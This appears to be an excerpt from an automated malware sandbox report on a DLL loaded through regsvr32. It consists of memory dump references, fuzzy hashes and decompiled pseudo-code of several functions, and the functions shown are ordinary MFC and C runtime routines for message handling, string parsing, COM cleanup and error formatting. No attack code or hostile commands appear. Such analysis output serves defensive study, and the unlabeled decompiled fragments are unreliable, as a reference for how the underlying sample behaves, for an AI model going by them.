                                                                                                            0x100116a3
                                                                                                            0x1001170a
                                                                                                            0x00000000
                                                                                                            0x100116a9
                                                                                                            0x100116a9
                                                                                                            0x100116ac
                                                                                                            0x100116ae
                                                                                                            0x100116bf
                                                                                                            0x100116c6
                                                                                                            0x100116c8
                                                                                                            0x100116cb
                                                                                                            0x100116cf
                                                                                                            0x100116d1
                                                                                                            0x100116d3
                                                                                                            0x100116d4
                                                                                                            0x100116d9
                                                                                                            0x100116dc
                                                                                                            0x100116df
                                                                                                            0x100116e5
                                                                                                            0x100116ec
                                                                                                            0x100116f4
                                                                                                            0x100116f7
                                                                                                            0x10011707
                                                                                                            0x10011707
                                                                                                            0x100116f7
                                                                                                            0x00000000
                                                                                                            0x100116c6
                                                                                                            0x100116b0
                                                                                                            0x100116bd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100116bd
                                                                                                            0x100116a3
                                                                                                            0x1001164e
                                                                                                            0x10011650
                                                                                                            0x10011657
                                                                                                            0x10011659
                                                                                                            0x1001165c
                                                                                                            0x1001165e
                                                                                                            0x10011662
                                                                                                            0x10011662
                                                                                                            0x1001165e
                                                                                                            0x10011657
                                                                                                            0x10011667
                                                                                                            0x1001166f
                                                                                                            0x10011677
                                                                                                            0x1001167f
                                                                                                            0x10011687
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __msize_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1288803200-0
                                                                                                            • Opcode ID: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
                                                                                                            • Instruction ID: f1eca33ff59634d1dad84df821d0f84545a75b9cee29ec0de7196f6c68877e4a
                                                                                                            • Opcode Fuzzy Hash: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
                                                                                                            • Instruction Fuzzy Hash: F1218F346047019BDB58EF74D881ADA77F6EF45291B11852AF8198F296DB30ECD1CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001EB9E Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E1001EB9E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1001FBC4(0x10034b90, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1000EC55(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1000E519();
						}
						L17:
						return E1001FC9C(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1000E519();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}







                                                                                                            0x1001eb9e
                                                                                                            0x1001eb9e
                                                                                                            0x1001eba5
                                                                                                            0x1001ebb0
                                                                                                            0x1001ebb6
                                                                                                            0x1001ebc3
                                                                                                            0x1001ebc6
                                                                                                            0x1001ec2b
                                                                                                            0x1001ec2b
                                                                                                            0x1001ec2e
                                                                                                            0x1001ec50
                                                                                                            0x1001ec56
                                                                                                            0x1001ec58
                                                                                                            0x1001ec62
                                                                                                            0x1001ec62
                                                                                                            0x1001ec65
                                                                                                            0x1001ec65
                                                                                                            0x1001ec6c
                                                                                                            0x1001ec6e
                                                                                                            0x1001ec71
                                                                                                            0x1001ec72
                                                                                                            0x1001ec72
                                                                                                            0x1001ec7a
                                                                                                            0x1001ec7f
                                                                                                            0x1001ec7f
                                                                                                            0x1001ec30
                                                                                                            0x1001ec30
                                                                                                            0x1001ec34
                                                                                                            0x1001ec37
                                                                                                            0x1001ec39
                                                                                                            0x1001ec3c
                                                                                                            0x1001ec3d
                                                                                                            0x1001ec3d
                                                                                                            0x1001ec42
                                                                                                            0x1001ec44
                                                                                                            0x00000000
                                                                                                            0x1001ec44
                                                                                                            0x1001ebcb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001ebd2
                                                                                                            0x1001ebda
                                                                                                            0x00000000
                                                                                                            0x1001ebe1
                                                                                                            0x1001ebe7
                                                                                                            0x1001ebee
                                                                                                            0x1001ec01
                                                                                                            0x1001ec05
                                                                                                            0x1001ec18
                                                                                                            0x1001ec23
                                                                                                            0x1001ec26
                                                                                                            0x00000000
                                                                                                            0x1001ec26

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 1001EBA5
                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1001EBFF
                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1001EC16
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1001EC50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePeek$H_prolog3
                                                                                                            • String ID:
                                                                                                            • API String ID: 3998274959-0
                                                                                                            • Opcode ID: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
                                                                                                            • Instruction ID: 7a5ad787edd883707f1bdef7fe17baf98f592d1ae8ded73e135a3cc4ce0c4401
                                                                                                            • Opcode Fuzzy Hash: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
                                                                                                            • Instruction Fuzzy Hash: 98314B75A0068AEFDB20DFA4CD95EAE73E8FF04744F110919F652AA181D770EE818B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001338A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 20%
                                                                                                            			E1001338A(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x10045580; // 0x8f64cb61
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E100235A2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E100235A2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E100234D2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E100233E3();
						} else {
							_t23 = E100233BA();
						}
						L17:
						return E1001FBB5(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}















                                                                                                            0x1001338a
                                                                                                            0x1001338a
                                                                                                            0x10013393
                                                                                                            0x1001339a
                                                                                                            0x100133a0
                                                                                                            0x100133a3
                                                                                                            0x100133a8
                                                                                                            0x100133ae
                                                                                                            0x100133af
                                                                                                            0x100133b2
                                                                                                            0x100133b7
                                                                                                            0x100133ca
                                                                                                            0x100133cb
                                                                                                            0x100133cd
                                                                                                            0x100133d3
                                                                                                            0x100133ee
                                                                                                            0x100133e3
                                                                                                            0x100133e9
                                                                                                            0x100133e9
                                                                                                            0x100133f3
                                                                                                            0x100133f7
                                                                                                            0x10013400
                                                                                                            0x10013400
                                                                                                            0x10013406
                                                                                                            0x1001340e
                                                                                                            0x1001340f
                                                                                                            0x10013410
                                                                                                            0x10013412
                                                                                                            0x10013412
                                                                                                            0x10013416
                                                                                                            0x100133bf
                                                                                                            0x100133bf
                                                                                                            0x00000000
                                                                                                            0x10013418
                                                                                                            0x1001341c
                                                                                                            0x10013424
                                                                                                            0x10013426
                                                                                                            0x10013427
                                                                                                            0x10013430
                                                                                                            0x10013429
                                                                                                            0x10013429
                                                                                                            0x10013429
                                                                                                            0x10013438
                                                                                                            0x10013444
                                                                                                            0x10013444
                                                                                                            0x10013416
                                                                                                            0x100133bb
                                                                                                            0x100133bd
                                                                                                            0x100133bd
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?), ref: 100133E1
                                                                                                              • Part of subcall function 100235A2: __ismbcspace_l.LIBCMT ref: 100235A8
                                                                                                            • CharNextA.USER32(00000000), ref: 100133FE
                                                                                                            • _strtol.LIBCMT ref: 10013429
                                                                                                            • _strtoul.LIBCMT ref: 10013430
                                                                                                              • Part of subcall function 100233E3: strtoxl.LIBCMT ref: 10023403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                            • String ID:
                                                                                                            • API String ID: 4211061542-0
                                                                                                            • Opcode ID: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
                                                                                                            • Instruction ID: f08684c254250480d72764a4ddbea2980768ff31fde62085fc420af539802239
                                                                                                            • Opcode Fuzzy Hash: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
                                                                                                            • Instruction Fuzzy Hash: 132124725002959BCB11DB758C81BAAB7E8EF49240F9180A6F991DB041DB70EE848B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001829A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1001829A(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E10018237( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}









                                                                                                            0x1001829e
                                                                                                            0x100182a3
                                                                                                            0x10018347
                                                                                                            0x10018347
                                                                                                            0x100182aa
                                                                                                            0x100182b2
                                                                                                            0x100182c6
                                                                                                            0x100182c9
                                                                                                            0x1001831f
                                                                                                            0x10018325
                                                                                                            0x10018325
                                                                                                            0x10018328
                                                                                                            0x1001832d
                                                                                                            0x1001833e
                                                                                                            0x1001833e
                                                                                                            0x00000000
                                                                                                            0x10018344
                                                                                                            0x100182cb
                                                                                                            0x100182cc
                                                                                                            0x1001830f
                                                                                                            0x1001830f
                                                                                                            0x10018313
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018318
                                                                                                            0x00000000
                                                                                                            0x10018318
                                                                                                            0x100182ce
                                                                                                            0x100182d1
                                                                                                            0x10018307
                                                                                                            0x00000000
                                                                                                            0x10018307
                                                                                                            0x100182d3
                                                                                                            0x100182d4
                                                                                                            0x00000000
                                                                                                            0x100182d6
                                                                                                            0x100182d6
                                                                                                            0x100182d9
                                                                                                            0x100182e1
                                                                                                            0x100182e6
                                                                                                            0x100182eb
                                                                                                            0x100182f4
                                                                                                            0x100182f7
                                                                                                            0x100182fc
                                                                                                            0x10018301
                                                                                                            0x10018301
                                                                                                            0x100182fc
                                                                                                            0x100182eb
                                                                                                            0x00000000
                                                                                                            0x100182d9
                                                                                                            0x100182d4
                                                                                                            0x100182b4
                                                                                                            0x100182b8
                                                                                                            0x00000000
                                                                                                            0x100182ba
                                                                                                            0x100182bb
                                                                                                            0x00000000
                                                                                                            0x100182bb

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253174383-0
                                                                                                            • Opcode ID: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
                                                                                                            • Instruction ID: c02b11928bb34d0169e99c27a309c5edd31e5ee767437d52a490cee524480b39
                                                                                                            • Opcode Fuzzy Hash: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
                                                                                                            • Instruction Fuzzy Hash: 831149306006169FDB95DF65D888BAE77E9EF05A82B594428F866DE190CB35DF80CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016E59 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10016E59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E1001FBC4(E100341C0, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038988;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E1000EC55(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E10010284(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E1000E519();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038068;
						E100102E5(_t64 - 0x1c);
						return E1001FC9C(_t55);
					}
					_push(_t60);
					E10015A21( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E1000E519();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}











                                                                                                            0x10016e59
                                                                                                            0x10016e59
                                                                                                            0x10016e60
                                                                                                            0x10016e65
                                                                                                            0x10016e67
                                                                                                            0x10016e6a
                                                                                                            0x10016e71
                                                                                                            0x10016e7a
                                                                                                            0x10016e7d
                                                                                                            0x10016e80
                                                                                                            0x10016e88
                                                                                                            0x10016e8c
                                                                                                            0x10016eca
                                                                                                            0x10016ed2
                                                                                                            0x10016edb
                                                                                                            0x10016ef0
                                                                                                            0x10016efe
                                                                                                            0x10016f04
                                                                                                            0x10016f06
                                                                                                            0x10016f09
                                                                                                            0x10016e91
                                                                                                            0x10016e95
                                                                                                            0x10016e9b
                                                                                                            0x10016e9e
                                                                                                            0x10016ea0
                                                                                                            0x10016ea2
                                                                                                            0x10016ea5
                                                                                                            0x10016ea6
                                                                                                            0x10016ea6
                                                                                                            0x10016eab
                                                                                                            0x10016ead
                                                                                                            0x10016ead
                                                                                                            0x10016eb4
                                                                                                            0x10016ebb
                                                                                                            0x10016ec7
                                                                                                            0x10016ec7
                                                                                                            0x10016f14
                                                                                                            0x10016f15
                                                                                                            0x10016f1a
                                                                                                            0x10016f1d
                                                                                                            0x10016f20
                                                                                                            0x10016f22
                                                                                                            0x10016f25
                                                                                                            0x10016f26
                                                                                                            0x10016f26
                                                                                                            0x00000000
                                                                                                            0x10016f20
                                                                                                            0x10016e8e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EqualH_prolog3Intersect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2161412305-0
                                                                                                            • Opcode ID: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
                                                                                                            • Instruction ID: 9e2c62e01a377e36abd0cffc80b86d38f34e6c8c4516d003d55709a082953a26
                                                                                                            • Opcode Fuzzy Hash: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
                                                                                                            • Instruction Fuzzy Hash: BA21027690024AEFDF02DFA4CC809AEBBB8FF08201F00855AF555AB112DB75EA45DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100050DA Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E100050DA(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1001FBC4(E10032EBF, __ebx, __edi, __esi);
				_t35 = E10004D4A(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E100050A8(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E100209E8( &_a4, 0x1003e34c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10004EB7(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}
















                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050e1
                                                                                                            0x100050ee
                                                                                                            0x100050f0
                                                                                                            0x100050f3
                                                                                                            0x100050f7
                                                                                                            0x100050fa
                                                                                                            0x100050fc
                                                                                                            0x100050fc
                                                                                                            0x10005101
                                                                                                            0x10005104
                                                                                                            0x10005108
                                                                                                            0x1000510b
                                                                                                            0x10005117
                                                                                                            0x1000511c
                                                                                                            0x1000511e
                                                                                                            0x10005120
                                                                                                            0x10005123
                                                                                                            0x10005128
                                                                                                            0x1000512a
                                                                                                            0x1000512a
                                                                                                            0x10005148
                                                                                                            0x1000515e
                                                                                                            0x10005169
                                                                                                            0x10005171
                                                                                                            0x10005171
                                                                                                            0x1000514a
                                                                                                            0x1000514d
                                                                                                            0x1000514f
                                                                                                            0x1000514f
                                                                                                            0x10005174

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 100050E1
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10005117
                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,1000103F,00000000,00000000,?,?,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10005140
                                                                                                              • Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7
                                                                                                            • LocalFree.KERNEL32(1000103F,1000103F,8007000E,100010E9), ref: 10005169
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
